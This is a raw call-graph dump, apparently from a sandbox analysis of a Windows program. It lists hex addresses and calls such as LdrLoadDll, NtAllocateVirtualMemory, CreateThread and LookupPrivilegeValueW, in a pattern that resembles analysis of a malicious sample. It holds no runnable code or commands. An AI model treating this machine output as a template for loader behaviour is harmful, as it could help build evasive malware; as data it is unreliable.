33285->33202 33287 27de0dd 33286->33287 33288 27de0f4 33286->33288 33287->33288 33289 27de3b0 2 API calls 33287->33289 33288->33212 33290 27de10b 33289->33290 33290->33212 33291->33203 33292->33189 33294 27dd3a0 LdrLoadDll 33293->33294 33295 27dc7bc 33294->33295 33298 4529560 LdrInitializeThunk 33295->33298 33296 27d72f3 33296->33251 33298->33296 33299 27e149d 33302 27dde70 33299->33302 33303 27dde96 33302->33303 33310 27ca0e0 33303->33310 33305 27ddea2 33308 27dded0 33305->33308 33318 27c90f0 33305->33318 33350 27dca90 33308->33350 33353 27ca030 33310->33353 33312 27ca0ed 33313 27ca0f4 33312->33313 33365 27c9fd0 33312->33365 33313->33305 33319 27c9117 33318->33319 33627 27cb620 33319->33627 33321 27c9129 33631 27cb370 33321->33631 33323 27c915e 33330 27c9165 33323->33330 33672 27cb2a0 LdrLoadDll 33323->33672 33325 27c941d 33325->33308 33327 27c91d5 33327->33325 33328 27de3b0 2 API calls 33327->33328 33329 27c91eb 33328->33329 33331 27de3b0 2 API calls 33329->33331 33330->33325 33635 27ce2e0 33330->33635 33332 27c91fc 33331->33332 33333 27de3b0 2 API calls 33332->33333 33334 27c920d 33333->33334 33647 27cc880 33334->33647 33336 27c921a 33337 27d7350 10 API calls 33336->33337 33338 27c922b 33337->33338 33339 27d7350 10 API calls 33338->33339 33340 27c923c 33339->33340 33341 27c925d 33340->33341 33342 27d7350 10 API calls 33340->33342 33343 27d7350 10 API calls 33341->33343 33349 27c92a5 33341->33349 33344 27c9256 33342->33344 33346 27c9274 33343->33346 33673 27cc9d0 LdrLoadDll 33344->33673 33346->33349 33674 27cd370 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33346->33674 33349->33325 33659 27c8d70 33349->33659 33351 27dd3a0 LdrLoadDll 33350->33351 33352 27dcaaf 33351->33352 33384 27db010 33353->33384 33357 27ca056 33357->33312 33358 27ca04c 33358->33357 33391 27dd720 33358->33391 33360 27ca093 33360->33357 33402 27c9e70 33360->33402 33362 27ca0b3 33408 27c98d0 LdrLoadDll 33362->33408 33364 27ca0c5 33364->33312 33602 27dda10 33365->33602 33368 27dda10 LdrLoadDll 33369 27ca001 33368->33369 33370 27dda10 LdrLoadDll 33369->33370 33371 27ca01a 33370->33371 33372 27ce0a0 33371->33372 33373 27ce0b9 33372->33373 33610 27cb4a0 33373->33610 33375 27ce0cc 33614 27dc5c0 33375->33614 33378 27ca105 33378->33305 33380 27ce0f2 33381 27ce11d 33380->33381 33620 27dc640 33380->33620 33383 27dc870 2 API calls 33381->33383 33383->33378 33385 27db01f 33384->33385 33386 27d7760 LdrLoadDll 33385->33386 33387 27ca043 33386->33387 33388 27daed0 33387->33388 33409 27dc9e0 33388->33409 33392 27dd739 33391->33392 33393 27d7350 10 API calls 33392->33393 33394 27dd751 33393->33394 33395 27dd75a 33394->33395 33412 27dd560 33394->33412 33395->33360 33397 27dd76e 33397->33395 33429 27dc2e0 33397->33429 33399 27dd7a2 33400 27de2d0 2 API calls 33399->33400 33401 27dd7cc 33400->33401 33401->33360 33580 27c7660 33402->33580 33404 27c9e91 33404->33362 33405 27c9e8a 33405->33404 33593 27c7920 33405->33593 33408->33364 33410 27dd3a0 LdrLoadDll 33409->33410 33411 27daee5 33410->33411 33411->33358 33413 27dd57b 33412->33413 33414 27dd58d 33413->33414 33434 27de250 33413->33434 33414->33397 33416 27dd5ad 33437 27d6960 33416->33437 33418 27dd5d0 33418->33414 33419 27d6960 3 API calls 33418->33419 33422 27dd5f2 33419->33422 33421 27dd67a 33423 27dd68a 33421->33423 33557 27dd330 LdrLoadDll 33421->33557 33422->33414 33462 27d7cb0 33422->33462 33473 27dd1a0 33423->33473 33426 27dd6b8 33552 27dc2a0 33426->33552 33428 27dd6e2 33428->33397 33430 27dd3a0 LdrLoadDll 33429->33430 33431 27dc2fc 33430->33431 33577 452967a 33431->33577 33432 27dc317 33432->33399 33558 27dc920 33434->33558 33436 27de27d 33436->33416 33438 27d6971 33437->33438 33439 27d6979 33437->33439 33438->33418 33461 27d6c4c 33439->33461 33561 27df440 33439->33561 33441 27d69cd 33442 27df440 2 API calls 33441->33442 33445 27d69d8 33442->33445 33443 27d6a26 33446 27df440 2 API calls 33443->33446 33445->33443 33569 27df4e0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33445->33569 33447 27d6a3a 33446->33447 33448 27df440 2 API calls 33447->33448 33450 27d6aad 33448->33450 33449 27df440 2 API calls 33457 27d6af5 33449->33457 33450->33449 33453 27df4a0 2 API calls 33454 27d6c2e 33453->33454 33455 27df4a0 2 API calls 33454->33455 33456 27d6c38 33455->33456 33458 27df4a0 2 API calls 33456->33458 33566 27df4a0 33457->33566 33459 27d6c42 33458->33459 33460 27df4a0 2 API calls 33459->33460 33460->33461 33461->33418 33463 27d7cc1 33462->33463 33464 27d7350 10 API calls 33463->33464 33469 27d7cd7 33464->33469 33465 27d7ce0 33465->33421 33466 27d7d17 33467 27de2d0 2 API calls 33466->33467 33468 27d7d25 33467->33468 33468->33421 33469->33465 33469->33466 33470 27d7d60 33469->33470 33471 27de2d0 2 API calls 33470->33471 33472 27d7d65 33471->33472 33472->33421 33570 27dd030 33473->33570 33475 27dd1b4 33476 27dd030 LdrLoadDll 33475->33476 33477 27dd1bd 33476->33477 33478 27dd030 LdrLoadDll 33477->33478 33479 27dd1c6 33478->33479 33480 27dd030 LdrLoadDll 33479->33480 33481 27dd1cf 33480->33481 33482 27dd030 LdrLoadDll 33481->33482 33483 27dd1d8 33482->33483 33484 27dd030 LdrLoadDll 33483->33484 33485 27dd1e1 33484->33485 33486 27dd030 LdrLoadDll 33485->33486 33487 27dd1ed 33486->33487 33488 27dd030 LdrLoadDll 33487->33488 33489 27dd1f6 33488->33489 33490 27dd030 LdrLoadDll 33489->33490 33491 27dd1ff 33490->33491 33492 27dd030 LdrLoadDll 33491->33492 33493 27dd208 33492->33493 33494 27dd030 LdrLoadDll 33493->33494 33495 27dd211 33494->33495 33496 27dd030 LdrLoadDll 33495->33496 33497 27dd21a 33496->33497 33498 27dd030 LdrLoadDll 33497->33498 33499 27dd226 33498->33499 33500 27dd030 LdrLoadDll 33499->33500 33501 27dd22f 33500->33501 33502 27dd030 LdrLoadDll 33501->33502 33503 27dd238 33502->33503 33504 27dd030 LdrLoadDll 33503->33504 33505 27dd241 33504->33505 33506 27dd030 LdrLoadDll 33505->33506 33507 27dd24a 33506->33507 33508 27dd030 LdrLoadDll 33507->33508 33509 27dd253 33508->33509 33510 27dd030 LdrLoadDll 33509->33510 33511 27dd25f 33510->33511 33512 27dd030 LdrLoadDll 33511->33512 33513 27dd268 33512->33513 33514 27dd030 LdrLoadDll 33513->33514 33515 27dd271 33514->33515 33516 27dd030 LdrLoadDll 33515->33516 33517 27dd27a 33516->33517 33518 27dd030 LdrLoadDll 33517->33518 33519 27dd283 33518->33519 33520 27dd030 LdrLoadDll 33519->33520 33521 27dd28c 33520->33521 33522 27dd030 LdrLoadDll 33521->33522 33523 27dd298 33522->33523 33524 27dd030 LdrLoadDll 33523->33524 33525 27dd2a1 33524->33525 33526 27dd030 LdrLoadDll 33525->33526 33527 27dd2aa 33526->33527 33528 27dd030 LdrLoadDll 33527->33528 33529 27dd2b3 33528->33529 33530 27dd030 LdrLoadDll 33529->33530 33531 27dd2bc 33530->33531 33532 27dd030 LdrLoadDll 33531->33532 33533 27dd2c5 33532->33533 33534 27dd030 LdrLoadDll 33533->33534 33535 27dd2d1 33534->33535 33536 27dd030 LdrLoadDll 33535->33536 33537 27dd2da 33536->33537 33538 27dd030 LdrLoadDll 33537->33538 33539 27dd2e3 33538->33539 33540 27dd030 LdrLoadDll 33539->33540 33541 27dd2ec 33540->33541 33542 27dd030 LdrLoadDll 33541->33542 33543 27dd2f5 33542->33543 33544 27dd030 LdrLoadDll 33543->33544 33545 27dd2fe 33544->33545 33546 27dd030 LdrLoadDll 33545->33546 33547 27dd30a 33546->33547 33548 27dd030 LdrLoadDll 33547->33548 33549 27dd313 33548->33549 33550 27dd030 LdrLoadDll 33549->33550 33551 27dd31c 33550->33551 33551->33426 33553 27dd3a0 LdrLoadDll 33552->33553 33554 27dc2bc 33553->33554 33576 4529860 LdrInitializeThunk 33554->33576 33555 27dc2d3 33555->33428 33557->33423 33559 27dd3a0 LdrLoadDll 33558->33559 33560 27dc93c NtAllocateVirtualMemory 33559->33560 33560->33436 33562 27df456 33561->33562 33563 27df450 33561->33563 33564 27de3b0 2 API calls 33562->33564 33563->33441 33565 27df47c 33564->33565 33565->33441 33567 27de2d0 2 API calls 33566->33567 33568 27d6c24 33567->33568 33568->33453 33569->33445 33571 27dd04b 33570->33571 33572 27d7760 LdrLoadDll 33571->33572 33573 27dd06b 33572->33573 33574 27d7760 LdrLoadDll 33573->33574 33575 27dd11f 33573->33575 33574->33575 33575->33475 33576->33555 33578 4529681 33577->33578 33579 452968f LdrInitializeThunk 33577->33579 33578->33432 33579->33432 33581 27c766b 33580->33581 33582 27c7670 33580->33582 33581->33405 33583 27de250 2 API calls 33582->33583 33586 27c7695 33583->33586 33584 27c76f8 33584->33405 33585 27dc2a0 2 API calls 33585->33586 33586->33584 33586->33585 33587 27c76fe 33586->33587 33591 27de250 2 API calls 33586->33591 33596 27dc9a0 33586->33596 33589 27c7724 33587->33589 33590 27dc9a0 2 API calls 33587->33590 33589->33405 33592 27c7715 33590->33592 33591->33586 33592->33405 33594 27dc9a0 2 API calls 33593->33594 33595 27c793e 33594->33595 33595->33362 33597 27dd3a0 LdrLoadDll 33596->33597 33598 27dc9bc 33597->33598 33601 45296e0 LdrInitializeThunk 33598->33601 33599 27dc9d3 33599->33586 33601->33599 33603 27dda33 33602->33603 33606 27cb150 33603->33606 33607 27cb174 33606->33607 33608 27c9fed 33607->33608 33609 27cb1b0 LdrLoadDll 33607->33609 33608->33368 33609->33608 33611 27cb4c3 33610->33611 33613 27cb540 33611->33613 33625 27dc070 LdrLoadDll 33611->33625 33613->33375 33615 27dd3a0 LdrLoadDll 33614->33615 33616 27ce0db 33615->33616 33616->33378 33617 27dcbb0 33616->33617 33618 27dd3a0 LdrLoadDll 33617->33618 33619 27dcbcf LookupPrivilegeValueW 33618->33619 33619->33380 33621 27dd3a0 LdrLoadDll 33620->33621 33622 27dc65c 33621->33622 33626 4529910 LdrInitializeThunk 33622->33626 33623 27dc67b 33623->33381 33625->33613 33626->33623 33628 27cb647 33627->33628 33629 27cb4a0 LdrLoadDll 33628->33629 33630 27cb6aa 33629->33630 33630->33321 33632 27cb394 33631->33632 33675 27dc070 LdrLoadDll 33632->33675 33634 27cb3ce 33634->33323 33636 27ce2ec 33635->33636 33637 27cb620 LdrLoadDll 33636->33637 33638 27ce31e 33637->33638 33676 27ce1b0 33638->33676 33641 27ce339 33642 27ce344 33641->33642 33644 27dc870 2 API calls 33641->33644 33642->33327 33643 27ce351 33645 27dc870 2 API calls 33643->33645 33646 27ce362 33643->33646 33644->33642 33645->33646 33646->33327 33648 27cc896 33647->33648 33649 27cc8a0 33647->33649 33648->33336 33650 27cb4a0 LdrLoadDll 33649->33650 33651 27cc911 33650->33651 33652 27cb370 LdrLoadDll 33651->33652 33653 27cc925 33652->33653 33654 27cc948 33653->33654 33655 27cb4a0 LdrLoadDll 33653->33655 33654->33336 33656 27cc964 33655->33656 33657 27d7350 10 API calls 33656->33657 33658 27cc9b9 33657->33658 33658->33336 33695 27ce5a0 33659->33695 33661 27c90de 33661->33325 33662 27c8d8a 33662->33661 33701 27d6c90 33662->33701 33664 27df440 2 API calls 33669 27c8f7e 33664->33669 33665 27c8de6 33665->33661 33665->33664 33666 27c7660 4 API calls 33666->33669 33669->33661 33669->33666 33671 27c7920 2 API calls 33669->33671 33704 27cc5d0 33669->33704 33752 27ce540 33669->33752 33756 27cdfa0 33669->33756 33671->33669 33672->33330 33673->33341 33674->33349 33675->33634 33677 27ce1ca 33676->33677 33685 27ce280 33676->33685 33678 27cb4a0 LdrLoadDll 33677->33678 33679 27ce1ec 33678->33679 33686 27dc320 33679->33686 33681 27ce22e 33689 27dc360 33681->33689 33684 27dc870 2 API calls 33684->33685 33685->33641 33685->33643 33687 27dd3a0 LdrLoadDll 33686->33687 33688 27dc33c 33687->33688 33688->33681 33690 27dd3a0 LdrLoadDll 33689->33690 33691 27dc37c 33690->33691 33694 4529fe0 LdrInitializeThunk 33691->33694 33692 27ce274 33692->33684 33694->33692 33696 27ce5ad 33695->33696 33697 27d7760 LdrLoadDll 33696->33697 33698 27ce5c5 33697->33698 33699 27ce5cc SetErrorMode 33698->33699 33700 27ce5d3 33698->33700 33699->33700 33700->33662 33770 27ce370 33701->33770 33703 27d6cb6 33703->33665 33705 27cc5e9 33704->33705 33706 27cc5ef 33704->33706 33790 27cdc90 33705->33790 33797 27c9bc0 33706->33797 33709 27cc5fc 33710 27cc629 33709->33710 33711 27ce540 2 API calls 33709->33711 33751 27cc872 33709->33751 33806 27dc0f0 33710->33806 33711->33710 33714 27cc750 33813 27cc570 LdrLoadDll LdrInitializeThunk 33714->33813 33715 27dc2e0 2 API calls 33716 27cc6a7 33715->33716 33716->33714 33720 27cc6b3 33716->33720 33718 27cc76f 33719 27cc777 33718->33719 33814 27cc4e0 LdrLoadDll NtClose LdrInitializeThunk 33718->33814 33721 27dc870 2 API calls 33719->33721 33723 27dc3f0 2 API calls 33720->33723 33727 27cc6f9 33720->33727 33720->33751 33724 27cc781 33721->33724 33723->33727 33724->33669 33725 27dc870 2 API calls 33728 27cc716 33725->33728 33726 27cc799 33726->33719 33729 27cc7a0 33726->33729 33727->33725 33809 27db750 33728->33809 33731 27cc7b5 33729->33731 33815 27cc460 LdrLoadDll LdrInitializeThunk 33729->33815 33816 27dc170 LdrLoadDll 33731->33816 33733 27cc72d 33733->33751 33812 27c7ad0 LdrLoadDll 33733->33812 33735 27cc7c9 33817 27cc2c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33735->33817 33738 27cc7ed 33740 27cc82e 33738->33740 33818 27dc1a0 LdrLoadDll 33738->33818 33739 27cc746 33739->33669 33820 27dc200 LdrLoadDll 33740->33820 33743 27cc80b 33743->33740 33819 27dc230 LdrLoadDll 33743->33819 33744 27cc83c 33745 27dc870 2 API calls 33744->33745 33746 27cc846 33745->33746 33747 27dc870 2 API calls 33746->33747 33749 27cc850 33747->33749 33749->33751 33821 27c7ad0 LdrLoadDll 33749->33821 33751->33669 33753 27ce553 33752->33753 33842 27dc270 33753->33842 33757 27cdfb7 33756->33757 33758 27cdfd7 33756->33758 33757->33758 33848 27cddd0 33757->33848 33765 27ce019 33758->33765 33868 27cdc10 33758->33868 33762 27ce04b 33763 27ce071 33762->33763 33891 27dae80 12 API calls 33762->33891 33763->33669 33765->33762 33890 27cd5c0 12 API calls 33765->33890 33769 27d7350 10 API calls 33769->33765 33771 27ce38d 33770->33771 33777 27dc3a0 33771->33777 33774 27ce3d5 33774->33703 33778 27dc3b6 33777->33778 33779 27dd3a0 LdrLoadDll 33778->33779 33780 27dc3bc 33779->33780 33788 45299a0 LdrInitializeThunk 33780->33788 33781 27ce3ce 33781->33774 33783 27dc3f0 33781->33783 33784 27dd3a0 LdrLoadDll 33783->33784 33785 27dc40c 33784->33785 33789 4529780 LdrInitializeThunk 33785->33789 33786 27ce3fe 33786->33703 33788->33781 33789->33786 33822 27cd640 33790->33822 33792 27cddaa 33793 27de3b0 2 API calls 33792->33793 33794 27cddb9 33793->33794 33794->33706 33795 27cdcae 33795->33792 33831 27db5d0 33795->33831 33798 27c9bd8 33797->33798 33799 27ce1b0 3 API calls 33798->33799 33805 27c9cfb 33798->33805 33800 27c9cdc 33799->33800 33801 27c9d0a 33800->33801 33802 27c9cf1 33800->33802 33803 27dc870 2 API calls 33800->33803 33801->33709 33841 27c6c90 LdrLoadDll 33802->33841 33803->33802 33805->33709 33807 27dd3a0 LdrLoadDll 33806->33807 33808 27cc67d 33807->33808 33808->33714 33808->33715 33808->33751 33810 27ce540 2 API calls 33809->33810 33811 27db782 33810->33811 33811->33733 33812->33739 33813->33718 33814->33726 33815->33731 33816->33735 33817->33738 33818->33743 33819->33740 33820->33744 33821->33751 33823 27cd673 33822->33823 33837 27cb790 33823->33837 33825 27cd685 33826 27ce370 3 API calls 33825->33826 33827 27cd6c8 33826->33827 33828 27cd6cf 33827->33828 33829 27de3f0 2 API calls 33827->33829 33828->33795 33830 27cd6df 33829->33830 33830->33795 33832 27db5df 33831->33832 33833 27d7760 LdrLoadDll 33832->33833 33834 27db5f7 33833->33834 33835 27db61d 33834->33835 33836 27db60a CreateThread 33834->33836 33835->33792 33836->33792 33838 27cb7b7 33837->33838 33839 27cb4a0 LdrLoadDll 33838->33839 33840 27cb7f3 33839->33840 33840->33825 33841->33805 33843 27dd3a0 LdrLoadDll 33842->33843 33844 27dc28c 33843->33844 33847 4529840 LdrInitializeThunk 33844->33847 33845 27ce57e 33845->33669 33847->33845 33849 27cde00 33848->33849 33892 27d6680 33849->33892 33851 27cde4e 33921 27d5540 33851->33921 33853 27cde54 33955 27d2360 33853->33955 33855 27cde5a 33986 27d45c0 33855->33986 33861 27cde6e 34030 27d5da0 33861->34030 33863 27cde74 34054 27cfcb0 33863->34054 33865 27cde8c 34069 27d0f50 33865->34069 33869 27cdc28 33868->33869 33873 27cdc7f 33868->33873 33870 27d1190 10 API calls 33869->33870 33869->33873 33871 27cdc69 33870->33871 33871->33873 34374 27d13e0 12 API calls 33871->34374 33873->33763 33874 27cda50 33873->33874 33875 27cda6c 33874->33875 33889 27cdb4b 33874->33889 33877 27dc870 2 API calls 33875->33877 33875->33889 33876 27cdbe1 33878 27cdbfe 33876->33878 33880 27d7350 10 API calls 33876->33880 33879 27cda87 33877->33879 33878->33765 33878->33769 34375 27ccf40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33879->34375 33880->33878 33882 27cdbbb 33882->33876 34377 27cd110 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33882->34377 33884 27cdabf 33886 27cb4a0 LdrLoadDll 33884->33886 33887 27cdad0 33886->33887 33888 27cb4a0 LdrLoadDll 33887->33888 33888->33889 33889->33876 34376 27ccf40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33889->34376 33890->33762 33891->33763 33893 27d66a8 33892->33893 33894 27cb4a0 LdrLoadDll 33893->33894 33895 27d66bc 33894->33895 34074 27ccd00 33895->34074 33897 27d66f6 33897->33851 33898 27d66ef 33898->33897 33899 27cb4a0 LdrLoadDll 33898->33899 33900 27d671e 33899->33900 33901 27cb4a0 LdrLoadDll 33900->33901 33902 27d6742 33901->33902 34085 27ccdc0 33902->34085 33904 27d67a8 33906 27cb4a0 LdrLoadDll 33904->33906 33905 27d6766 33905->33904 33918 27d692b 33905->33918 34089 27d63d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33905->34089 33908 27d67c8 33906->33908 33909 27ccdc0 2 API calls 33908->33909 33913 27d67ec 33909->33913 33910 27d6832 33911 27ccdc0 2 API calls 33910->33911 33915 27d6862 33911->33915 33913->33910 33913->33918 34090 27d63d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33913->34090 33914 27d68a8 33917 27ccdc0 2 API calls 33914->33917 33915->33914 33915->33918 34091 27d63d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33915->34091 33919 27d6907 33917->33919 33918->33851 33919->33918 34092 27d63d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33919->34092 33922 27d55a4 33921->33922 33923 27cb4a0 LdrLoadDll 33922->33923 33924 27d5671 33923->33924 33925 27ccd00 3 API calls 33924->33925 33927 27d56a4 33925->33927 33926 27d56ab 33926->33853 33927->33926 33928 27cb4a0 LdrLoadDll 33927->33928 33929 27d56d3 33928->33929 33930 27ccdc0 2 API calls 33929->33930 33931 27d5713 33930->33931 33932 27d5842 33931->33932 33953 27d5833 33931->33953 34108 27d5330 33931->34108 33934 27dc870 2 API calls 33932->33934 33936 27d584c 33934->33936 33935 27d5748 33935->33932 33937 27d5753 33935->33937 33936->33853 33938 27de3b0 2 API calls 33937->33938 33939 27d577c 33938->33939 33940 27d579b 33939->33940 33941 27d5785 33939->33941 34137 27d5220 CoInitialize 33940->34137 33942 27dc870 2 API calls 33941->33942 33944 27d578f 33942->33944 33944->33853 33945 27d57a9 34139 27dc580 33945->34139 33947 27d5822 33948 27dc870 2 API calls 33947->33948 33950 27d582c 33948->33950 33952 27de2d0 2 API calls 33950->33952 33951 27d57c7 33951->33947 33954 27dc580 2 API calls 33951->33954 34144 27d5150 LdrLoadDll RtlFreeHeap 33951->34144 33952->33953 33953->33853 33954->33951 33956 27d2388 33955->33956 33957 27de3b0 2 API calls 33956->33957 33959 27d23e8 33957->33959 33958 27d23f1 33958->33855 33959->33958 34146 27d17c0 33959->34146 33961 27d241a 33962 27d243a 33961->33962 34176 27d1ad0 LdrLoadDll 33961->34176 33964 27d2458 33962->33964 34178 27d40c0 12 API calls 33962->34178 33971 27d2472 33964->33971 34180 27cb2a0 LdrLoadDll 33964->34180 33965 27d2428 33965->33962 34177 27d20e0 10 API calls 33965->34177 33968 27d244c 34179 27d40c0 12 API calls 33968->34179 33972 27d17c0 12 API calls 33971->33972 33973 27d249f 33972->33973 33974 27d24c0 33973->33974 34181 27d1ad0 LdrLoadDll 33973->34181 33975 27d24de 33974->33975 34183 27d40c0 12 API calls 33974->34183 33978 27d24f8 33975->33978 34185 27cb2a0 LdrLoadDll 33975->34185 33982 27de2d0 2 API calls 33978->33982 33979 27d24ae 33979->33974 34182 27d20e0 10 API calls 33979->34182 33980 27d24d2 34184 27d40c0 12 API calls 33980->34184 33985 27d2502 33982->33985 33985->33855 33987 27d45e6 33986->33987 33988 27cb4a0 LdrLoadDll 33987->33988 33989 27d4615 33988->33989 33990 27cb4a0 LdrLoadDll 33989->33990 33991 27d4641 33989->33991 33990->33991 34205 27ce7a0 33991->34205 33993 27d4725 33994 27cde62 33993->33994 34210 27d42d0 33993->34210 33996 27d5860 33994->33996 33997 27d45c0 12 API calls 33996->33997 33998 27cde68 33997->33998 33999 27d32e0 33998->33999 34000 27d3302 33999->34000 34001 27cb4a0 LdrLoadDll 34000->34001 34002 27d34cd 34001->34002 34003 27cb4a0 LdrLoadDll 34002->34003 34004 27d34de 34003->34004 34005 27cb370 LdrLoadDll 34004->34005 34006 27d34f5 34005->34006 34290 27d31a0 34006->34290 34009 27d31a0 13 API calls 34010 27d3568 34009->34010 34011 27d31a0 13 API calls 34010->34011 34012 27d3580 34011->34012 34013 27d31a0 13 API calls 34012->34013 34014 27d3598 34013->34014 34015 27d31a0 13 API calls 34014->34015 34016 27d35b0 34015->34016 34017 27d31a0 13 API calls 34016->34017 34018 27d35cb 34017->34018 34019 27d35e5 34018->34019 34020 27d31a0 13 API calls 34018->34020 34019->33861 34021 27d3619 34020->34021 34022 27d31a0 13 API calls 34021->34022 34023 27d3656 34022->34023 34024 27d31a0 13 API calls 34023->34024 34025 27d3693 34024->34025 34026 27d31a0 13 API calls 34025->34026 34027 27d36d0 34026->34027 34028 27d31a0 13 API calls 34027->34028 34029 27d370d 34028->34029 34029->33861 34031 27d5dbd 34030->34031 34032 27cb150 LdrLoadDll 34031->34032 34033 27d5dd8 34032->34033 34034 27d7760 LdrLoadDll 34033->34034 34051 27d5fd9 34033->34051 34035 27d5e05 34034->34035 34036 27d7760 LdrLoadDll 34035->34036 34037 27d5e1e 34036->34037 34038 27d7760 LdrLoadDll 34037->34038 34039 27d5e37 34038->34039 34040 27d7760 LdrLoadDll 34039->34040 34041 27d5e53 34040->34041 34042 27d7760 LdrLoadDll 34041->34042 34043 27d5e6c 34042->34043 34044 27d7760 LdrLoadDll 34043->34044 34045 27d5e85 34044->34045 34046 27d7760 LdrLoadDll 34045->34046 34047 27d5ea1 34046->34047 34048 27d7760 LdrLoadDll 34047->34048 34049 27d5eba 34048->34049 34050 27d7760 LdrLoadDll 34049->34050 34052 27d5ed2 34050->34052 34051->33863 34052->34051 34305 27d59a0 LdrLoadDll 34052->34305 34055 27cfcc6 34054->34055 34065 27cfcd1 34054->34065 34056 27de3b0 2 API calls 34055->34056 34056->34065 34057 27cfce7 34057->33865 34058 27d7760 LdrLoadDll 34058->34065 34059 27cfdcc GetFileAttributesW 34059->34065 34060 27cff4f 34061 27cff68 34060->34061 34062 27de2d0 2 API calls 34060->34062 34061->33865 34062->34061 34064 27cb4a0 LdrLoadDll 34064->34065 34065->34057 34065->34058 34065->34059 34065->34060 34065->34064 34066 27d3720 10 API calls 34065->34066 34306 27daa70 34065->34306 34310 27da900 11 API calls 34065->34310 34311 27da7a0 11 API calls 34065->34311 34066->34065 34312 27d0cd0 34069->34312 34071 27d0f5d 34333 27d09b0 34071->34333 34073 27cde9e 34073->33758 34075 27ccd2c 34074->34075 34076 27dc5c0 LdrLoadDll 34075->34076 34077 27ccd45 34076->34077 34078 27ccd4c 34077->34078 34093 27dc600 34077->34093 34078->33898 34082 27ccd87 34083 27dc870 2 API calls 34082->34083 34084 27ccdaa 34083->34084 34084->33898 34086 27ccde5 34085->34086 34102 27dc470 34086->34102 34089->33904 34090->33910 34091->33914 34092->33918 34094 27dd3a0 LdrLoadDll 34093->34094 34095 27dc61c 34094->34095 34096 27ccd6f 34095->34096 34101 4529710 LdrInitializeThunk 34095->34101 34096->34078 34098 27dcbf0 34096->34098 34099 27dd3a0 LdrLoadDll 34098->34099 34100 27dcc0f 34099->34100 34100->34082 34101->34096 34103 27dd3a0 LdrLoadDll 34102->34103 34104 27dc48c 34103->34104 34107 45296d0 LdrInitializeThunk 34104->34107 34105 27cce59 34105->33905 34107->34105 34109 27d534c 34108->34109 34110 27cb150 LdrLoadDll 34109->34110 34112 27d5367 34110->34112 34111 27d5370 34111->33935 34112->34111 34113 27d7760 LdrLoadDll 34112->34113 34114 27d538d 34113->34114 34115 27d7760 LdrLoadDll 34114->34115 34116 27d53a8 34115->34116 34117 27d7760 LdrLoadDll 34116->34117 34118 27d53c1 34117->34118 34119 27d7760 LdrLoadDll 34118->34119 34120 27d53dd 34119->34120 34121 27d7760 LdrLoadDll 34120->34121 34122 27d53f6 34121->34122 34123 27d7760 LdrLoadDll 34122->34123 34124 27d540f 34123->34124 34125 27cb150 LdrLoadDll 34124->34125 34127 27d543b 34125->34127 34126 27d54e9 34126->33935 34127->34126 34128 27d7760 LdrLoadDll 34127->34128 34129 27d545f 34128->34129 34130 27cb150 LdrLoadDll 34129->34130 34131 27d5494 34130->34131 34131->34126 34132 27d7760 LdrLoadDll 34131->34132 34133 27d54b7 34132->34133 34134 27d7760 LdrLoadDll 34133->34134 34135 27d54d0 34134->34135 34136 27d7760 LdrLoadDll 34135->34136 34136->34126 34138 27d5285 34137->34138 34138->33945 34140 27dd3a0 LdrLoadDll 34139->34140 34141 27dc59c 34140->34141 34145 4529610 LdrInitializeThunk 34141->34145 34142 27dc5bb 34142->33951 34144->33951 34145->34142 34147 27d1858 34146->34147 34148 27cb4a0 LdrLoadDll 34147->34148 34149 27d18f6 34148->34149 34150 27cb4a0 LdrLoadDll 34149->34150 34151 27d1911 34150->34151 34152 27ccdc0 2 API calls 34151->34152 34153 27d1936 34152->34153 34154 27d1a7d 34153->34154 34198 27dc500 34153->34198 34156 27d1a8e 34154->34156 34186 27d1190 34154->34186 34156->33961 34159 27d1a73 34160 27dc870 2 API calls 34159->34160 34160->34154 34161 27d196f 34162 27dc870 2 API calls 34161->34162 34163 27d19a9 34162->34163 34203 27de490 LdrLoadDll 34163->34203 34165 27d19df 34165->34156 34166 27ccdc0 2 API calls 34165->34166 34167 27d1a05 34166->34167 34167->34156 34168 27dc500 2 API calls 34167->34168 34169 27d1a2a 34168->34169 34170 27d1a5d 34169->34170 34171 27d1a31 34169->34171 34172 27dc870 2 API calls 34170->34172 34173 27dc870 2 API calls 34171->34173 34174 27d1a67 34172->34174 34175 27d1a3b 34173->34175 34174->33961 34175->33961 34176->33965 34177->33962 34178->33968 34179->33964 34180->33971 34181->33979 34182->33974 34183->33980 34184->33975 34185->33978 34187 27d11b5 34186->34187 34188 27cb4a0 LdrLoadDll 34187->34188 34189 27d1270 34188->34189 34190 27cb4a0 LdrLoadDll 34189->34190 34191 27d1294 34190->34191 34192 27d7350 10 API calls 34191->34192 34194 27d12e7 34192->34194 34193 27d13a1 34193->34156 34194->34193 34195 27cb4a0 LdrLoadDll 34194->34195 34196 27d134e 34195->34196 34197 27d7350 10 API calls 34196->34197 34197->34193 34199 27dd3a0 LdrLoadDll 34198->34199 34200 27dc51c 34199->34200 34204 4529650 LdrInitializeThunk 34200->34204 34201 27d1964 34201->34159 34201->34161 34203->34165 34204->34201 34206 27d7760 LdrLoadDll 34205->34206 34207 27ce7bf 34206->34207 34208 27ce7c6 GetFileAttributesW 34207->34208 34209 27ce7d1 34207->34209 34208->34209 34209->33993 34234 27dabd0 34210->34234 34212 27d433b 34212->33993 34213 27d42e6 34213->34212 34214 27d4305 34213->34214 34215 27d4347 34213->34215 34217 27d430d 34214->34217 34218 27d432a 34214->34218 34216 27cb4a0 LdrLoadDll 34215->34216 34220 27d4358 34216->34220 34221 27de2d0 2 API calls 34217->34221 34219 27de2d0 2 API calls 34218->34219 34219->34212 34223 27d7350 10 API calls 34220->34223 34222 27d431e 34221->34222 34222->33993 34224 27d436f 34223->34224 34274 27d3720 34224->34274 34226 27d437a 34230 27d4392 34226->34230 34231 27d4478 34226->34231 34227 27de2d0 2 API calls 34228 27d4583 34227->34228 34228->33993 34229 27d445f 34229->34227 34230->34229 34284 27d3cb0 11 API calls 34230->34284 34231->34229 